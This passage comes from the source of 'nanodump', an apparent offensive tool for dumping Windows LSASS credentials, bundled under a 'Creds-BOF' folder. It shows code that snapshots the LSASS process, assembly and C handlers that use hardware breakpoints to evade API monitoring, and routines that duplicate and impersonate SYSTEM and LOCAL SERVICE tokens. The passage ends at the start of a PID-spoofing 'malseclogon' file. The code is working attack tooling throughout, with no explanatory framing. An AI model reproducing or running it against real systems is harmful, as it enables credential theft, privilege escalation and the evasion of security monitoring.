    PssNtCaptureSnapshot = (PssNtCaptureSnapshot_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        PssNtCaptureSnapshot_SW2_HASH,
        0);
    if (!PssNtCaptureSnapshot)
    {
        api_not_found("PssNtCaptureSnapshot");
        goto cleanup;
    }

    *hSnapshot    = NULL;
    process_flags = PROCESS_PPSCAPTURESNAPSHOT_PERMISSIONS;
    thread_flags  = THREAD_PPSCAPTURESNAPSHOT_PERMISSIONS;

    error_code = PssNtCaptureSnapshot(
        hSnapshot,
        hProcess,
        process_flags,
        thread_flags);

    NtClose(hProcess); hProcess = NULL;

    if (error_code != ERROR_SUCCESS)
    {
        DPRINT_ERR("Could not create a snapshot of " LSASS ", error: 0x%lx", error_code);
        goto cleanup;
    }

    DPRINT(
        "Created a snapshot of the " LSASS " process, snapshot handle: 0x%lx",
        (DWORD)(ULONG_PTR)*hSnapshot);

    // find the address of PssNtQuerySnapshot dynamically
    PssNtQuerySnapshot = (PssNtQuerySnapshot_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        PssNtQuerySnapshot_SW2_HASH,
        0);
    if (!PssNtQuerySnapshot)
    {
        api_not_found("PssNtQuerySnapshot");
        goto cleanup;
    }

    error_code = PssNtQuerySnapshot(
        *hSnapshot,
        PSS_QUERY_VA_CLONE_INFORMATION,
        &hCloneProcess,
        sizeof(PVOID));
    if (error_code != ERROR_SUCCESS)
    {
        DPRINT_ERR("Could not query the snapshot of " LSASS ", error: 0x%lx", error_code);
        goto cleanup;
    }

    ret_val = TRUE;

    DPRINT(
        "Got a handle to the snapshot process: 0x%lx",
        (DWORD)(ULONG_PTR)hCloneProcess);

cleanup:
    if (hProcess)
        NtClose(hProcess);
    if (!ret_val && *hSnapshot)
        NtClose(*hSnapshot);
    if (!ret_val && hCloneProcess)
        NtClose(hCloneProcess);

    if (ret_val)
        return hCloneProcess;
    else
        return NULL;
}

// frees a snapshot of the LSASS process
BOOL free_snapshot(
    IN HANDLE hSnapshot)
{
    PssNtFreeSnapshot_t PssNtFreeSnapshot = NULL;
    DWORD error_code = 0;

    if (!hSnapshot)
        return TRUE;

    PssNtFreeSnapshot = (PssNtFreeSnapshot_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        PssNtFreeSnapshot_SW2_HASH,
        0);
    if (!PssNtFreeSnapshot)
    {
        api_not_found("PssNtFreeSnapshot");
        return FALSE;
    }

    error_code = PssNtFreeSnapshot(hSnapshot);

    NtClose(hSnapshot); hSnapshot = NULL;

    if (error_code != ERROR_SUCCESS)
    {
        DPRINT_ERR("Could not free the snapshot of " LSASS ", error: 0x%lx", error_code);
        return FALSE;
    }
    DPRINT("The snapshot has been freed");

    return TRUE;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/hw_breakpoint-asm.asm
================================================
.code

hwbp_handler PROC
	mov rax, [rcx]
	mov eax, [rax]
	cmp eax, 080000004h
	jnz leave1
	mov rax, rcx
	mov rcx, [rax+008h]
	mov rax, [rcx+078h]
	mov r11, [rcx+098h]
	mov r9, 0DEADBEEFCAFEBABEh
	search_loop:
	add r11, 08h
	cmp [r11], r9
	jne search_loop
	mov r11, [r11+008h]
	mov rcx, [r11+000h]
	mov rdx, [r11+008h]
	mov r9, [r11+010h]
	mov rbx, [r11+018h]
	mov rbp, [r11+020h]
	mov rsp, [r11+028h]
	mov r8, [r11+030h]
	xor r11, r11
	restore_stack_loop:
	mov r10b, [rdx+r11]
	mov [r9+r11], r10b
	inc r11
	cmp r11, rcx
	jne restore_stack_loop
	jmp r8
	leave1:
	mov eax, 0ffffffffh
	ret
hwbp_handler ENDP

end


================================================
FILE: Creds-BOF/nanodump/source/hw_breakpoint.c
================================================

#include "hw_breakpoint.h"

ULONG_PTR set_bits(
    ULONG_PTR dw,
    int lowBit,
    int bits,
    ULONG_PTR newValue)
{
    ULONG_PTR mask = (1UL << bits) - 1UL;
    dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);
    return dw;
}

VOID clear_breakpoint(
    CONTEXT* ctx,
    int index)
{
    //Clear the releveant hardware breakpoint
    switch (index)
    {
        case 0:
            ctx->Dr0 = 0;
            break;
        case 1:
            ctx->Dr1 = 0;
            break;
        case 2:
            ctx->Dr2 = 0;
            break;
        case 3:
            ctx->Dr3 = 0;
            break;
    }
     //Clear DRx HBP to disable for local mode
    ctx->Dr7 = set_bits(ctx->Dr7, (index * 2), 1, 0);
    ctx->Dr6 = 0;
    ctx->EFlags = 0;
}

VOID enable_breakpoint(
    CONTEXT* ctx,
    PVOID address,
    int index)
{
    switch (index)
    {
        case 0:
            ctx->Dr0 = (ULONG_PTR)address;
            break;
        case 1:
            ctx->Dr1 = (ULONG_PTR)address;
            break;
        case 2:
            ctx->Dr2 = (ULONG_PTR)address;
            break;
        case 3:
            ctx->Dr3 = (ULONG_PTR)address;
            break;
    }

    //Set bits 16-31 as 0, which sets
    //DR0-DR3 HBP's for execute HBP
    ctx->Dr7 = set_bits(ctx->Dr7, 16, 16, 0);

    //Set DRx HBP as enabled for local mode
    ctx->Dr7 = set_bits(ctx->Dr7, (index * 2), 1, 1);
    ctx->Dr6 = 0;
}

/*
 * This function is responsible for:
 * 1) find the relevant information after the canary
 * 2) restore the registers
 * 3) restore the original stack
 * 4) return to trigger_syscall/trigger_api
 */

#if defined(_MSC_VER) && defined (_M_IX86)

__declspec(naked) __attribute__((stdcall)) LONG hwbp_handler(
    PEXCEPTION_POINTERS exceptions)
{
    __asm {
        // check that the ExceptionCode is EXCEPTION_SINGLE_STEP
        mov ecx, [esp+0x04]
        mov eax, [ecx]
        mov eax, [eax]
        cmp eax, 0x80000004
        jnz leave
        // ecx: ContextRecord
        mov ecx, [ecx+0x04]
        // get the status
        mov eax, [ecx+0xb0]
        // search for the canary
        // edi: exceptions->ContextRecord->Rsp
        mov edi, [ecx+0xc4]
        mov esi, 0xDEADBEEF
        search_loop:
        add edi, 0x04
        cmp dword ptr [edi], esi
        jne search_loop
        // edi: storing_area
        mov edi, [edi+0x04]
        // restore the original stack
        // full_stack_size
        mov ecx, [edi+0x00]
        // full_stack_backup_addr
        mov esi, [edi+0x04]
        // full_stack_base
        mov edx, [edi+0x08]
        restore_stack_loop:
        mov bl, [esi+ecx-0x1]
        mov [edx+ecx-0x1], bl
        dec ecx
        cmp ecx, 0x0
        jne restore_stack_loop
        // restore registers
        mov ebx, [edi+0x0c]
        mov ebp, [edi+0x10]
        mov esp, [edi+0x14]
        mov edi, [edi+0x18]
        // jump back to the Nt* function
        jmp edi
        leave:
        mov eax, 0xffffffff
        ret
    }
}

#elif defined(__GNUC__)

__declspec(naked) LONG hwbp_handler(
    PEXCEPTION_POINTERS exceptions)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        // check that the ExceptionCode is EXCEPTION_SINGLE_STEP
        "mov rax, [rcx] \n"
        "mov eax, [rax] \n"
        "cmp eax, 0x80000004 \n"
        "jnz leave \n"
        // get the status code
        "mov rax, rcx \n"
        "mov rcx, [rax+0x08] \n"
        "mov rax, [rcx+0x78] \n"
        // search for the canary
        // r11: exceptions->ContextRecord->Rsp
        "mov r11, [rcx+0x98] \n"
        "mov r9, 0xDEADBEEFCAFEBABE \n"
        "search_loop: \n"
        "add r11, 0x8 \n"
        "cmp [r11], r9 \n"
        "jne search_loop \n"
        // r11: storing_area
        "mov r11, [r11+0x08] \n"
        // full_stack_size
        "mov rcx, [r11+0x00] \n"
        // full_stack_backup_addr
        "mov rdx, [r11+0x08] \n"
        // full_stack_base
        "mov r9, [r11+0x10] \n"
        // restore RBX
        "mov rbx, [r11+0x18] \n"
        // restore RBP
        "mov rbp, [r11+0x20] \n"
        // restore RSP
        "mov rsp, [r11+0x28] \n"
        // restore RIP
        "mov r8, [r11+0x30] \n"
        // restore the original stack
        "xor r11, r11 \n"
        "restore_stack_loop: \n"
        "mov r10b, [rdx+r11] \n"
        "mov [r9+r11], r10b \n"
        "inc r11 \n"
        "cmp r11, rcx \n"
        "jne restore_stack_loop \n"
        // jump back to the Nt* function
        "jmp r8 \n"
        "leave: \n"
        "mov eax, 0xffffffff \n"
        "ret \n"
    );
#else
    asm(
        SET_SYNTAX
        // check that the ExceptionCode is EXCEPTION_SINGLE_STEP
        "mov ecx, [esp+0x04] \n"
        "mov eax, [ecx] \n"
        "mov eax, [eax] \n"
        "cmp eax, 0x80000004 \n"
        "jnz leave \n"
        // ecx: ContextRecord
        "mov ecx, [ecx+0x04] \n"
        // get the status
        "mov eax, [ecx+0xb0] \n"
        // search for the canary
        // edi: exceptions->ContextRecord->Rsp
        "mov edi, [ecx+0xc4] \n"
        "mov esi, 0xDEADBEEF \n"
        "search_loop: \n"
        "add edi, 0x04 \n"
        "cmp dword ptr [edi], esi \n"
        "jne search_loop \n"
        // edi: storing_area
        "mov edi, [edi+0x04] \n"
        // restore the original stack
        // full_stack_size
        "mov ecx, [edi+0x00] \n"
        // full_stack_backup_addr
        "mov esi, [edi+0x04] \n"
        // full_stack_base
        "mov edx, [edi+0x08] \n"
        "restore_stack_loop: \n"
        "mov bl, [esi+ecx-0x1] \n"
        "mov [edx+ecx-0x1], bl \n"
        "dec ecx \n"
        "cmp ecx, 0x0 \n"
        "jne restore_stack_loop \n"
        // restore registers
        "mov ebx, [edi+0x0c] \n"
        "mov ebp, [edi+0x10] \n"
        "mov esp, [edi+0x14] \n"
        "mov edi, [edi+0x18] \n"
        // jump back to the Nt* function
        "jmp edi \n"
        "leave: \n"
        "mov eax, 0xffffffff \n"
        "ret \n"
    );
#endif
}

#endif

BOOL set_hwbp(
    PVOID address,
    PHANDLE phHwBpHandler)
{
    BOOL ret_val = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hHwBpHandler = NULL;
    CONTEXT threadCtx = { 0 };
    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;
    RtlAddVectoredExceptionHandler_t RtlAddVectoredExceptionHandler = NULL;

    // find the address of RtlAddVectoredExceptionHandler_t dynamically
    RtlAddVectoredExceptionHandler = (RtlAddVectoredExceptionHandler_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlAddVectoredExceptionHandler_SW2_HASH,
        0);
    if (!RtlAddVectoredExceptionHandler)
    {
        api_not_found("RtlAddVectoredExceptionHandler");
        goto cleanup;
    }

    hHwBpHandler = RtlAddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)hwbp_handler);
    if (!hHwBpHandler)
    {
        function_failed("RtlAddVectoredExceptionHandler");
        goto cleanup;
    }

    status = NtGetContextThread(NtCurrentThread(), &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetContextThread", status);
        goto cleanup;
    }

    enable_breakpoint(&threadCtx, address, DEBUG_REGISTER_INDEX);

    status = NtSetContextThread(NtCurrentThread(), &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetContextThread", status);
        goto cleanup;
    }

    *phHwBpHandler = hHwBpHandler;
    ret_val = TRUE;

cleanup:
    return ret_val;
}

VOID unset_hwbp(
    HANDLE hHwBpHandler)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    CONTEXT threadCtx = { 0 };
    memset(&threadCtx, 0, sizeof(threadCtx));
    threadCtx.ContextFlags = CONTEXT_ALL;
    ULONG ret_val = 0;
    RtlRemoveVectoredExceptionHandler_t RtlRemoveVectoredExceptionHandler = NULL;

    // find the address of RtlRemoveVectoredExceptionHandler dynamically
    RtlRemoveVectoredExceptionHandler = (RtlRemoveVectoredExceptionHandler_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlRemoveVectoredExceptionHandler_SW2_HASH,
        0);
    if (!RtlRemoveVectoredExceptionHandler)
    {
        api_not_found("RtlRemoveVectoredExceptionHandler");
        goto cleanup;
    }

    status = NtGetContextThread(NtCurrentThread(), &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtGetContextThread", status);
        goto cleanup;
    }

    clear_breakpoint(&threadCtx, DEBUG_REGISTER_INDEX);

    status = NtSetContextThread(NtCurrentThread(), &threadCtx);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetContextThread", status);
        goto cleanup;
    }

    ret_val = RtlRemoveVectoredExceptionHandler(hHwBpHandler);
    if (!ret_val)
    {
        function_failed("RtlRemoveVectoredExceptionHandler");
        goto cleanup;
    }

cleanup:
    return;
}


================================================
FILE: Creds-BOF/nanodump/source/impersonate.c
================================================
#include "impersonate.h"


BOOL impersonate_user(
    IN LPCWSTR pwszSid,
    OUT PHANDLE phToken,
    IN LPCWSTR pwszPrivileges[],
    IN DWORD dwPrivilegeCount)
{
    BOOL bReturnValue = FALSE;
    *phToken = NULL;
    HANDLE hToken = NULL;
    BOOL success = FALSE;

    LPCWSTR ppwszRequiredPrivileges[2] = {
        L"SeDebugPrivilege",
        L"SeImpersonatePrivilege"
    };

    success = check_token_privileges(
        NULL,
        ppwszRequiredPrivileges,
        ARRAY_SIZE(ppwszRequiredPrivileges),
        TRUE);
    if (!success)
        goto end;

    success = find_process_token_and_duplicate(
        pwszSid,
        pwszPrivileges,
        dwPrivilegeCount,
        &hToken);
    if (!success)
        goto end;

    success = impersonate(hToken);
    if (!success)
        goto end;

    *phToken = hToken;
    bReturnValue = TRUE;

end:
    if (!bReturnValue && hToken)
        NtClose(hToken);

    return bReturnValue;
}

BOOL impersonate(
    IN HANDLE hToken)
{
    NTSTATUS status;

    status = NtSetInformationThread(
        NtCurrentThread(),
        ThreadImpersonationToken,
        &hToken,
        sizeof(HANDLE));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetInformationThread", status);
        return FALSE;
    }

    return TRUE;
}

BOOL find_process_token_and_duplicate(
    IN LPCWSTR pwszTargetSid,
    IN LPCWSTR pwszPrivileges[],
    IN DWORD dwPrivilegeCount,
    OUT PHANDLE phToken)
{
    BOOL bReturnValue = FALSE;

    PSID pTargetSid = NULL;
    PVOID pBuffer = NULL;
    PSYSTEM_PROCESS_INFORMATION pProcInfo = NULL;
    HANDLE hProcess = NULL, hToken = NULL, hTokenDup = NULL;
    DWORD dwBufSize = 0x1000;
    DWORD dwPrevBufSize = dwBufSize;
    PSID pSidTmp = NULL;
    LPWSTR pwszUsername = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ConvertStringSidToSidW_t ConvertStringSidToSidW;
    CLIENT_ID uPid = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    OBJECT_ATTRIBUTES TokenObjectAttributes = { 0 };
    SECURITY_QUALITY_OF_SERVICE Qos = { 0 };
    BOOL success;

    ConvertStringSidToSidW = (ConvertStringSidToSidW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ConvertStringSidToSidW_SW2_HASH,
        0);
    if (!ConvertStringSidToSidW)
    {
        api_not_found("ConvertStringSidToSidW");
        goto end;
    }

    success = ConvertStringSidToSidW(pwszTargetSid, &pTargetSid);
    if (!success)
    {
        function_failed("ConvertStringSidToSidW");
        goto end;
    }

    // get information of all currently running processes
    do
    {
        dwPrevBufSize = dwBufSize;
        pBuffer = intAlloc(dwBufSize);
        if (!pBuffer)
        {
            malloc_failed();
            goto end;
        }

        status = NtQuerySystemInformation(
            SystemProcessInformation,
            pBuffer,
            dwBufSize,
            &dwBufSize);

        if (NT_SUCCESS(status))
            break;

        DATA_FREE(pBuffer, dwPrevBufSize);
    } while (status == STATUS_BUFFER_TOO_SMALL || status == STATUS_INFO_LENGTH_MISMATCH);

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQuerySystemInformation", status);
        goto end;
    }

    pProcInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;

    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    InitializeObjectAttributes(&TokenObjectAttributes, NULL, 0, NULL, NULL);
    Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    Qos.ImpersonationLevel = SecurityImpersonation;
    Qos.ContextTrackingMode = 0;
    Qos.EffectiveOnly = FALSE;
    TokenObjectAttributes.SecurityQualityOfService = &Qos;

    while (TRUE)
    {
        uPid.UniqueProcess = pProcInfo->UniqueProcessId;

        status = NtOpenProcess(
            &hProcess,
            PROCESS_QUERY_INFORMATION,
            &ObjectAttributes,
            &uPid);
        if (NT_SUCCESS(status))
        {
            // open a handle to the token of the process
            status = NtOpenProcessToken(
                hProcess,
                TOKEN_QUERY|TOKEN_DUPLICATE,
                &hToken);

            if (NT_SUCCESS(status))
            {
                status = NtDuplicateToken(
                    hToken,
                    MAXIMUM_ALLOWED,
                    &TokenObjectAttributes,
                    FALSE,
                    TokenImpersonation,
                    &hTokenDup);

                if (NT_SUCCESS(status))
                {
                    success = token_get_sid(hTokenDup, &pSidTmp);
                    if (success)
                    {
                        success = token_get_username(hTokenDup, &pwszUsername);
                        if (success)
                        {
                            success = token_compare_sids(pSidTmp, pTargetSid);
                            if (success)
                            {
                                DPRINT("Found a potential Process candidate: PID=%d - Image='%ls' - User='%ls'", (USHORT)(ULONG_PTR)pProcInfo->UniqueProcessId, pProcInfo->ImageName.Buffer, pwszUsername);

                                BOOL bTokenIsNotRestricted = FALSE;
                                success = token_is_not_restricted(hTokenDup, &bTokenIsNotRestricted);
                                if (success)
                                {
                                    if (!bTokenIsNotRestricted)
                                    {
                                        DPRINT("This token is restricted.");
                                    }
                                    else
                                    {
                                        DPRINT("This token is not restricted.");

                                        success = check_token_privileges(
                                            hTokenDup,
                                            pwszPrivileges,
                                            dwPrivilegeCount,
                                            TRUE);
                                        if (success)
                                        {
                                            DPRINT("Found a valid Token.");
                                            *phToken = hTokenDup;
                                            bReturnValue = TRUE;
                                        }
                                        else
                                        {
                                            DPRINT("The token was not valid.");
                                        }
                                    }
                                }
                            }
                            DATA_FREE(pwszUsername, wcslen(pwszUsername) * sizeof(WCHAR));
                        }
                        LocalFree(pSidTmp); pSidTmp = NULL;
                    }
                    if (!bReturnValue)
                    {
                        NtClose(hTokenDup); hTokenDup = NULL;
                    }
                }
                NtClose(hToken); hToken = NULL;
            }
            NtClose(hProcess); hProcess = NULL;
        }
        // If we found a valid token, stop
        if (bReturnValue)
            break;

        // If next entry is null, stop
        if (!pProcInfo->NextEntryOffset)
            break;

        // Increment SYSTEM_PROCESS_INFORMATION pointer
        pProcInfo = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)pProcInfo + pProcInfo->NextEntryOffset);
    }

    if (!bReturnValue)
    {
        PRINT_ERR("No valid process token to impersonate was found.");
    }

end:
    if (pTargetSid)
        LocalFree(pTargetSid);
    if (pBuffer)
    {
        DATA_FREE(pBuffer, dwBufSize);
    }

    return bReturnValue;
}

BOOL revert_to_self(VOID)
{
    BOOL success = FALSE;
    RevertToSelf_t RevertToSelf = NULL;

    RevertToSelf = (RevertToSelf_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RevertToSelf_SW2_HASH,
        0);
    if (!RevertToSelf)
    {
        api_not_found("RevertToSelf");
        return FALSE;
    }

    success = RevertToSelf();

    if (success)
    {
        DPRINT("Reverted to self");
    }
    else
    {
        function_failed("RevertToSelf");
    }

    return success;
}

BOOL impersonate_process(
    IN DWORD process_id,
    OUT PHANDLE phProcessToken)
{
    BOOL success = FALSE;
    HANDLE hProcess = NULL;
    HANDLE hToken = NULL;
    HANDLE hTokenDup = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    CLIENT_ID uPid = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    SECURITY_QUALITY_OF_SERVICE Qos = { 0 };
    OBJECT_ATTRIBUTES TokenObjectAttributes = { 0 };
    *phProcessToken = NULL;

    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    InitializeObjectAttributes(&TokenObjectAttributes, NULL, 0, NULL, NULL);
    Qos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    Qos.ImpersonationLevel = SecurityImpersonation;
    Qos.ContextTrackingMode = 0;
    Qos.EffectiveOnly = FALSE;
    TokenObjectAttributes.SecurityQualityOfService = &Qos;

    uPid.UniqueProcess = (HANDLE)(ULONG_PTR)process_id;

    LPCWSTR ppwszRequiredPrivileges[2] = {
        L"SeDebugPrivilege",
        L"SeImpersonatePrivilege"
    };

    success = check_token_privileges(
        NULL,
        ppwszRequiredPrivileges,
        ARRAY_SIZE(ppwszRequiredPrivileges),
        TRUE);
    if (!success)
        goto end;

    status = NtOpenProcess(
        &hProcess,
        PROCESS_QUERY_INFORMATION,
        &ObjectAttributes,
        &uPid);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenProcess", status);
        goto end;
    }

    status = NtOpenProcessToken(
        hProcess,
        TOKEN_QUERY|TOKEN_DUPLICATE,
        &hToken);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenProcessToken", status);
        goto end;
    }

    status = NtDuplicateToken(
        hToken,
        MAXIMUM_ALLOWED,
        &TokenObjectAttributes,
        FALSE,
        TokenImpersonation,
        &hTokenDup);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtDuplicateToken", status);
        goto end;
    }

    success = impersonate(hTokenDup);
    if (!success)
        goto end;

    *phProcessToken = hTokenDup;
    DPRINT("Impersonating PID %ld", process_id);

end:
    if (hProcess)
        NtClose(hProcess);
    if (hToken)
        NtClose(hToken);
    if (!success && hTokenDup)
        NtClose(hTokenDup);

    return success;
}

BOOL impersonate_system(
    OUT PHANDLE phSystemToken)
{
    BOOL success;
    LPCWSTR pwszPrivileges[2] = {
        L"SeDebugPrivilege",
        L"SeAssignPrimaryTokenPrivilege"
    };

    success = impersonate_user(
        L"S-1-5-18",
        phSystemToken,
        pwszPrivileges,
        ARRAY_SIZE(pwszPrivileges));

    if (!success)
    {
        PRINT_ERR("Could not impersonate SYSTEM");
    }

    return success;
}

BOOL impersonate_local_service(
    OUT PHANDLE phLocalServiceToken)
{
    BOOL success;
    
    success = impersonate_user(
        L"S-1-5-19",
        phLocalServiceToken,
        NULL,
        0);

    if (!success)
    {
        PRINT_ERR("Could not impersonate LOCAL SERVICE");
    }

    return success;
}

BOOL token_get_sid(
    IN HANDLE hToken,
    OUT PSID* ppSid)
{
    BOOL bReturnValue = FALSE;
    DWORD dwSize = 8;
    DWORD dwPrevSize = dwSize;
    PTOKEN_USER pTokenUser = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    BOOL success;
    CopySid_t CopySid;

    CopySid = (CopySid_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        CopySid_SW2_HASH,
        0);
    if (!CopySid)
    {
        api_not_found("CopySid");
        goto end;
    }

    do
    {
        dwPrevSize = dwSize;
        pTokenUser = intAlloc(dwSize);
        if (!pTokenUser)
        {
            malloc_failed();
            goto end;
        }

        status = NtQueryInformationToken(
            hToken,
            TokenUser,
            pTokenUser,
            dwSize,
            &dwSize);
        if (NT_SUCCESS(status))
            break;

        DATA_FREE(pTokenUser, dwPrevSize);
    } while (status == STATUS_BUFFER_TOO_SMALL);

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationToken", status);
        goto end;
    }

    *ppSid = (PSID)LocalAlloc(LPTR, SECURITY_MAX_SID_SIZE);
    if (!*ppSid)
    {
        function_failed("LocalAlloc");
        goto end;
    }

    success = CopySid(
        SECURITY_MAX_SID_SIZE,
        *ppSid,
        pTokenUser->User.Sid);
    if (!success)
    {
        function_failed("CopySid");
        goto end;
    }

    bReturnValue = TRUE;

end:
    if (pTokenUser)
    {
        DATA_FREE(pTokenUser, dwSize);
    }
    if (!bReturnValue && *ppSid)
    {
        LocalFree(*ppSid); *ppSid = NULL;
    }

    return bReturnValue;
}

BOOL token_get_sid_as_string(
    IN HANDLE hToken,
    OUT LPWSTR* ppwszStringSid)
{
    PSID pSid = NULL;
    BOOL success;
    ConvertSidToStringSidW_t ConvertSidToStringSidW;

    ConvertSidToStringSidW = (ConvertSidToStringSidW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ConvertSidToStringSidW_SW2_HASH,
        0);
    if (!ConvertSidToStringSidW)
    {
        api_not_found("ConvertSidToStringSidW");
        return FALSE;
    }

    success = token_get_sid(hToken, &pSid);
    if (!success)
        return FALSE;

    success = ConvertSidToStringSidW(pSid, ppwszStringSid);

    LocalFree(pSid); pSid = NULL;

    if (!success)
    {
        function_failed("ConvertSidToStringSidW");
        return FALSE;
    }

    return TRUE;
}

BOOL is_current_user_system(
    OUT PBOOL pbResult)
{
    HANDLE hToken = NULL;
    LPWSTR pwszStringSid = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    BOOL success;

    status = NtOpenProcessToken(
        NtCurrentProcess(),
        TOKEN_QUERY,
        &hToken);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenProcessToken", status);
        return FALSE;
    }

    success = token_get_sid_as_string(
        hToken,
        &pwszStringSid);

    NtClose(hToken); hToken = NULL;

    if (!success)
        return FALSE;

    *pbResult = _wcsicmp(pwszStringSid, L"S-1-5-18") == 0;

    LocalFree(pwszStringSid); pwszStringSid = NULL;

    return TRUE;
}

BOOL token_compare_sids(
    IN PSID pSidA,
    IN PSID pSidB)
{
    BOOL bReturnValue = FALSE;
    LPWSTR pwszSidA = NULL;
    LPWSTR pwszSidB = NULL;
    ConvertSidToStringSidW_t ConvertSidToStringSidW;
    BOOL success;

    ConvertSidToStringSidW = (ConvertSidToStringSidW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        ConvertSidToStringSidW_SW2_HASH,
        0);
    if (!ConvertSidToStringSidW)
    {
        api_not_found("ConvertSidToStringSidW");
        goto end;
    }

    success = ConvertSidToStringSidW(pSidA, &pwszSidA);
    if (!success)
    {
        function_failed("ConvertSidToStringSidW");
        goto end;
    }

    success = ConvertSidToStringSidW(pSidB, &pwszSidB);
    if (!success)
    {
        function_failed("ConvertSidToStringSidW");
        goto end;
    }

    bReturnValue = _wcsicmp(pwszSidA, pwszSidB) == 0;

end:
    if (pwszSidA)
        LocalFree(pwszSidA);
    if (pwszSidB)
        LocalFree(pwszSidB);

    return bReturnValue;
}

BOOL token_is_not_restricted(
    IN HANDLE hToken,
    OUT PBOOL pbIsNotRestricted)
{
    DWORD dwSize = 8;
    DWORD dwPrevSize = dwSize;
    PTOKEN_GROUPS pTokenGroups = NULL;
    NTSTATUS status;

    do
    {
        dwPrevSize = dwSize;
        pTokenGroups = intAlloc(dwSize);
        if (!pTokenGroups)
        {
            malloc_failed();
            return FALSE;
        }

        status = NtQueryInformationToken(
            hToken,
            TokenRestrictedSids,
            pTokenGroups,
            dwSize,
            &dwSize);
        if (NT_SUCCESS(status))
            break;

        DATA_FREE(pTokenGroups, dwPrevSize);
    } while (status == STATUS_BUFFER_TOO_SMALL);

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationToken", status);
        return FALSE;
    }

    *pbIsNotRestricted = pTokenGroups->GroupCount == 0;

    DATA_FREE(pTokenGroups, dwSize);

    return TRUE;
}

BOOL token_get_username(
    IN HANDLE hToken,
    OUT LPWSTR* ppwszUsername)
{
    BOOL bReturnValue = FALSE;
    PSID pSid = NULL;
    const DWORD dwMaxSize = 256;
    WCHAR wszUsername[256] = { 0 };
    WCHAR wszDomain[256] = { 0 };
    DWORD dwMaxUsername = dwMaxSize;
    DWORD dwMaxDomain = dwMaxSize;
    SID_NAME_USE type;
    BOOL success;
    LookupAccountSidW_t LookupAccountSidW;

    LookupAccountSidW = (LookupAccountSidW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        LookupAccountSidW_SW2_HASH,
        0);
    if (!LookupAccountSidW)
    {
        api_not_found("LookupAccountSidW");
        goto end;
    }

    success = token_get_sid(hToken, &pSid);
    if (!success)
        goto end;

    success = LookupAccountSidW(
        NULL,
        pSid,
        wszUsername,
        &dwMaxUsername,
        wszDomain,
        &dwMaxDomain,
        &type);
    if (!success)
    {
        function_failed("LookupAccountSidW");
        goto end;
    }

    *ppwszUsername = intAlloc((dwMaxSize * 2 + 1) * sizeof(WCHAR));
    if (!*ppwszUsername)
    {
        malloc_failed();
        goto end;
    }

    wcsncpy(*ppwszUsername, wszDomain, dwMaxSize * 2 + 1);
    wcsncat(*ppwszUsername, L"\\", dwMaxSize * 2 + 1);
    wcsncat(*ppwszUsername, wszUsername, dwMaxSize * 2 + 1);

    bReturnValue = TRUE;

end:
    if (pSid)
        LocalFree(pSid);

    return bReturnValue;
}


================================================
FILE: Creds-BOF/nanodump/source/malseclogon.c
================================================
#include "malseclogon.h"
#include "handle.h"
#include "dinvoke.h"
#include "token_priv.h"

#if defined(NANO) && !defined(SSP)

VOID change_pid(
    IN DWORD new_pid,
    OUT PDWORD previous_pid)
{
    DWORD current_pid = (DWORD)READ_MEMLOC(CID_OFFSET);
    DPRINT(
        "Changing the current PID from %ld to %ld",
        current_pid,
        new_pid);
    if (previous_pid)
        *previous_pid = current_pid;
    PDWORD pPid = (PDWORD)&(((struct TEB*)NtCurrentTeb())->ClientId);
    // the memory region where the TEB is should be RW
    *pPid = new_pid;
}

VOID set_command_line(
    IN BOOL use_malseclogon_locally,
    IN LPWSTR command_line,
    IN LPCSTR program_name,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN LPWSTR synchronization_file)
{
    // program path
